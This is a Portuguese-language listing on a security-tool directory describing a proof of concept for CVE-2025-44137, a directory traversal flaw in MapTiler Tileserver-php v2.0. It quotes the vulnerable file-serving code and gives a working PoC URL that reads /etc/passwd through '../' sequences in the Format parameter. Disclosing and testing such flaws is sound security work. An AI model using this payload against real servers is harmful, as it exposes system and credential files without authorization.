Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-44137 — Prova de conceito de exploração para CVE-2025-44137: travessia de diretório não autenticada no MapTiler Tileserver-php v2.0, permitindo leitura arbitrária de arquivos através de parâmetros GET manipulados. | Kitploit
Ferramentas/GitHubGitHub/mheranco/cve-2025-44137
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubmheranco/cve-2025-44137

CVE-2025-44137

Prova de conceito de exploração para CVE-2025-44137: travessia de diretório não autenticada no MapTiler Tileserver-php v2.0, permitindo leitura arbitrária de arquivos através de parâmetros GET manipulados.

Ver Repositório
2há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-44137

Leitura de Arquivo Não Autenticada no MapTiler Tileserver-php v2.0.

Descrição

O MapTiler Tileserver-php v2.0 é vulnerável a Directory Traversal. A função renderTile dentro de tileserver.php é responsável por entregar tiles que são armazenados como arquivos no servidor via requisição web. Criar o caminho para um arquivo permite o uso de '../', que pode ser usado para ler qualquer arquivo no servidor web. Os parâmetros GET afetados são "TileMatrix", "TileRow", "TileCol" e "Format"

https://github.com/maptiler/tileserver-php/blob/d0fdeaec69688dc500b652a23669d724d7d53df2/tileserver.php#L381-L398

root@kitploit:~
      $name = './' . $tileset . '/' . $z . '/' . $x . '/' . $y;
      $mime = 'image/';
      if($ext != null){
        $name .= '.' . $ext;
      }
      if ($fp = @fopen($name, 'rb')) {
        if($ext != null){
          $mime .= $ext;
        }else{
          //detect image type from file
          $mimetypes = ['gif', 'jpeg', 'png'];
          $mime .= $mimetypes[exif_imagetype($name) - 1];
        }
        header('Access-Control-Allow-Origin: *');
        header('Content-Type: ' . $mime);
        header('Content-Length: ' . filesize($name));
        fpassthru($fp);
        die;

PoC

http://localhost/tileserver.php/x/1/1/1?Format=/../../../../../../../../../../../../../../etc/passwd&Request=x&layer=.

Screenshot 1 Screenshot 2

Créditos

Martin Herancourt

Baixar ferramenta